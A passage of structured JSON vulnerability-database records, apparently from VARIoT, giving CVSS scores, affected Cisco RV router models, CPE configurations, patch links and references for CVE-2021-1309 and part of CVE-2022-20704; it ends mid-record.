               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "ADJACENT_NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 8.3,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 6.5,
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Adjacent Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 8.3,
                  confidentialityImpact: "Complete",
                  exploitabilityScore: null,
                  id: "CVE-2021-1309",
                  impactScore: null,
                  integrityImpact: "Complete",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "ADJACENT_NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 8.3,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 6.5,
                  id: "CNVD-2021-35515",
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:A/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT_NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 8.8,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.8,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT_NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 7.4,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 2.8,
                  impactScore: 4,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Adjacent Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 8.8,
                  baseSeverity: "High",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2021-1309",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2021-1309",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2021-1309",
                  trust: 1,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2021-35515",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202104-441",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULMON",
                  id: "CVE-2021-1309",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1309",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1309",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2021-1309",
            trust: 3.9,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
            trust: 0.8,
         },
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
            trust: 0.6,
         },
         {
            db: "AUSCERT",
            id: "ESB-2021.1171.3",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2021-1309",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1309",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
   },
   id: "VAR-202104-0381",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
      ],
      trust: 1.1394850175,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
      ],
   },
   last_update_date: "2023-12-18T13:17:53.296000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-rv-multi-lldp-u7e4chCe",
            trust: 0.8,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce",
         },
         {
            title: "Patch for Cisco Link Layer Discovery Protocol buffer overflow vulnerability",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/265671",
         },
         {
            title: "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=147023",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-rv-multi-lldp-u7e4chce",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1309",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-401",
            trust: 1,
         },
         {
            problemtype: "Buffer error (CWE-119) [ Other ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce",
         },
         {
            trust: 2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2021-1309",
         },
         {
            trust: 0.6,
            url: "https://www.auscert.org.au/bulletins/esb-2021.1171.3",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/119.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1309",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1309",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-05-19T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            date: "2021-04-08T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1309",
         },
         {
            date: "2021-12-13T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            date: "2021-04-08T04:15:12.063000",
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            date: "2021-04-07T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-05-19T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-35515",
         },
         {
            date: "2021-04-14T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1309",
         },
         {
            date: "2021-12-13T02:45:00",
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
         {
            date: "2023-11-07T03:27:55.893000",
            db: "NVD",
            id: "CVE-2021-1309",
         },
         {
            date: "2022-08-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote or local",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Cisco Small Business RV  Series router   Buffer Error Vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005331",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-441",
         },
      ],
      trust: 0.6,
   },
}

var-202202-0329
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information may be obtained and information may be tampered with. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device.The specific flaw exists within the downloading of firmware files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0329",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv340",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv345p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv345",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340",
            scope: null,
            trust: 0.7,
            vendor: "cisco",
            version: null,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Gaurav Baruah",
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
      ],
      trust: 0.7,
   },
   cve: "CVE-2022-20704",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 5.8,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8.6,
                  impactScore: 4.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 5.8,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2022-20704",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "HIGH",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.8,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "LOW",
                  exploitabilityScore: 2.2,
                  impactScore: 2.5,
                  integrityImpact: "LOW",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "High",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.8,
                  baseSeverity: "Medium",
                  confidentialityImpact: "Low",
                  exploitabilityScore: null,
                  id: "CVE-2022-20704",
                  impactScore: null,
                  integrityImpact: "Low",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
                  version: "3.0",
               },
               {
                  attackComplexity: "HIGH",
                  attackVector: "ADJACENT",
                  author: "ZDI",
                  availabilityImpact: "HIGH",
                  baseScore: 7.1,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 1.2,
                  id: "CVE-2022-20704",
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 0.7,
                  userInteraction: "REQUIRED",
                  vectorString: "AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20704",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20704",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "ZDI",
                  id: "CVE-2022-20704",
                  trust: 0.7,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202202-165",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULMON",
                  id: "CVE-2022-20704",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "VULMON",
